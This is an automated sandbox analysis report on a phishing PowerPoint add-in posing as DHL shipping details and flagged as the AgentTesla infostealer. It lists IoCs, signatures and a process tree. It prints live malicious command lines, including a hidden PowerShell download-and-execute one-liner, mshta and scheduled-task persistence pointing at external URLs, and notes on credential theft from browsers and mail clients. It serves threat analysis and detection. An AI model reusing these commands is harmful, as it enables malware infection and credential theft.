Analysis
- max time kernel: 142s
- max time network: 136s
- platform: windows10_x64
- resource: win10-en-20211014
- submitted: 21-10-2021 11:22
- Static task: static1
- Behavioral task: behavioral1
- Sample: DHL Consignment Details.ppam
- Resource: win10-en-20211014

General
- Target: DHL Consignment Details.ppam
- Size: 8KB
- MD5: e49c885d3236afa32adef83e8a201573
- SHA1: f8e63da458adee3ece85529ddeba477a07087430
- SHA256: 6f931b139cdf0652432a133e3beef1ff6136571c8d953f3eee28316bbf9c5674
- SHA512: 7339c4c43193686e737c6c4dbfcaf7778195e2c51d057436426651c1a62375196f393b69e6abcffa1ca2fc75c4117fb719b5b51b3eb4bd4335c85a8d08f0e3ff
Malware Config
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description | pid | pid_target | process | target process
    Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 928 | 3576 | mshta.exe | POWERPNT.EXE
- AgentTesla Payload (3 IoCs)
  Processes:
    resource | yara_rule
    behavioral1/memory/2520-316-0x000000000043751E-mapping.dmp | family_agenttesla
    behavioral1/memory/664-383-0x000000000043751E-mapping.dmp | family_agenttesla
    behavioral1/memory/664-389-0x00000000056D0000-0x0000000005BCE000-memory.dmp | family_agenttesla
- Blocklisted process makes network request (15 IoCs)
  Processes:
    flow | pid | process
    40, 41, 43, 45, 47, 49, 51, 53, 55, 56, 58, 60, 62, 63 | 928 | mshta.exe
    65 | 3324 | powershell.exe
- Drops file in Drivers directory (2 IoCs)
  Processes:
    description | ioc | process
    File opened for modification | C:\Windows\system32\drivers\etc\hosts | jsc.exe
    File opened for modification | C:\Windows\system32\drivers\etc\hosts | RegAsm.exe
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk where infostealers will often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses Microsoft Outlook profiles (1 TTP, 6 IoCs)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegAsm.exe
    Key opened | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | jsc.exe
    Key opened | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | jsc.exe
    Key opened | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegAsm.exe
    Key opened | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegAsm.exe
    Key opened | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | jsc.exe
- Adds Run key to start application (2 TTPs, 5 IoCs)
  Processes:
    description | ioc | process
    Set value (str) | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%1230948@gagamutakakachota.blogspot.com/p/12.html\"" | mshta.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%1230948@machearkalonikahdi.blogspot.com/p/12.html\"" | mshta.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_e7293c57732f4f278d939202241e0b25.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_cf83a79c40724f5c8e18bb53de0f0399.txt').GetResponse().GetResponseStream()).ReadToend());" | mshta.exe
    Key created | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run | mshta.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%1230948@migimigichuchuchacha.blogspot.com/p/12.html\"" | mshta.exe
- Suspicious use of SetThreadContext (2 IoCs)
  Processes:
    description | pid | process | target process
    PID 3324 set thread context of 2520 | 3324 | powershell.exe | jsc.exe
    PID 3324 set thread context of 664 | 3324 | powershell.exe | RegAsm.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | POWERPNT.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | POWERPNT.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | POWERPNT.EXE
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | POWERPNT.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | POWERPNT.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | POWERPNT.EXE
- Kills process with taskkill (2 IoCs)
  Processes:
    pid | process
    3508 | taskkill.exe
    3660 | taskkill.exe
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
    pid | process
    3576 | POWERPNT.EXE
- Suspicious behavior: EnumeratesProcesses (9 IoCs)
  Processes:
    pid | process
    3052 | dw20.exe (2 entries)
    3324 | powershell.exe (3 entries)
    2520 | jsc.exe (2 entries)
    664 | RegAsm.exe (2 entries)
- Suspicious behavior: SetClipboardViewer (1 IoC)
  Processes:
    pid | process
    664 | RegAsm.exe
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 3508 | taskkill.exe
    Token: SeDebugPrivilege | 3660 | taskkill.exe
    Token: SeDebugPrivilege | 3324 | powershell.exe
    Token: SeDebugPrivilege | 2520 | jsc.exe
    Token: SeDebugPrivilege | 664 | RegAsm.exe
- Suspicious use of SetWindowsHookEx (5 IoCs)
  Processes:
    pid | process
    3576 | POWERPNT.EXE (3 entries)
    2520 | jsc.exe
    664 | RegAsm.exe
- Suspicious use of WriteProcessMemory (32 IoCs)
  Processes:
    description | pid | process | target process
    PID 3576 wrote to memory of 928 | 3576 | POWERPNT.EXE | mshta.exe (2 entries)
    PID 928 wrote to memory of 3508 | 928 | mshta.exe | taskkill.exe (2 entries)
    PID 928 wrote to memory of 3660 | 928 | mshta.exe | taskkill.exe (2 entries)
    PID 928 wrote to memory of 808 | 928 | mshta.exe | schtasks.exe (2 entries)
    PID 928 wrote to memory of 3324 | 928 | mshta.exe | powershell.exe (2 entries)
    PID 928 wrote to memory of 3052 | 928 | mshta.exe | dw20.exe (2 entries)
    PID 3324 wrote to memory of 2520 | 3324 | powershell.exe | jsc.exe (8 entries)
    PID 3324 wrote to memory of 1268 | 3324 | powershell.exe | csc.exe (2 entries)
    PID 1268 wrote to memory of 4008 | 1268 | csc.exe | cvtres.exe (2 entries)
    PID 3324 wrote to memory of 664 | 3324 | powershell.exe | RegAsm.exe (8 entries)
- outlook_office_path (1 IoC)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | jsc.exe
- outlook_win_path (1 IoC)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegAsm.exe
Processes (process tree; the number before each entry is its depth in the tree)

1: C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
   Command line: "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\DHL Consignment Details.ppam" /ou ""
   - Checks processor information in registry
   - Enumerates system info in registry
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory

  2: C:\Windows\System32\mshta.exe
     Command line: "C:\Windows\System32\mshta.exe" https://www.bitly.com/ajdwwdwdwdmlrufhjwijjd
     - Process spawned unexpected child process
     - Blocklisted process makes network request
     - Adds Run key to start application
     - Suspicious use of WriteProcessMemory

    3: C:\Windows\System32\taskkill.exe
       Command line: "C:\Windows\System32\taskkill.exe" /f /im winword.exe
       - Kills process with taskkill
       - Suspicious use of AdjustPrivilegeToken

    3: C:\Windows\System32\taskkill.exe
       Command line: "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
       - Kills process with taskkill
       - Suspicious use of AdjustPrivilegeToken

    3: C:\Windows\System32\schtasks.exe
       Command line: "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%1230948@kumakahchachi.blogspot.com/p/12.html\""
       - Creates scheduled task(s)

    3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
       Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_e7293c57732f4f278d939202241e0b25.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_cf83a79c40724f5c8e18bb53de0f0399.txt').GetResponse().GetResponseStream()).ReadToend());
       - Blocklisted process makes network request
       - Suspicious use of SetThreadContext
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of AdjustPrivilegeToken
       - Suspicious use of WriteProcessMemory

      4: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
         Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
         - Drops file in Drivers directory
         - Accesses Microsoft Outlook profiles
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of SetWindowsHookEx
         - outlook_office_path

      4: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
         Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f0cdxpot\f0cdxpot.cmdline"
         - Suspicious use of WriteProcessMemory

        5: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
           Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES36BC.tmp" "c:\Users\Admin\AppData\Local\Temp\f0cdxpot\CSC9B77D845C3004C18AFA9F28466A9A068.TMP"

      4: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
         Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
         - Drops file in Drivers directory
         - Accesses Microsoft Outlook profiles
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious behavior: SetClipboardViewer
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of SetWindowsHookEx
         - outlook_win_path

    3: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
       Command line: dw20.exe -x -s 2856
       - Suspicious behavior: EnumeratesProcesses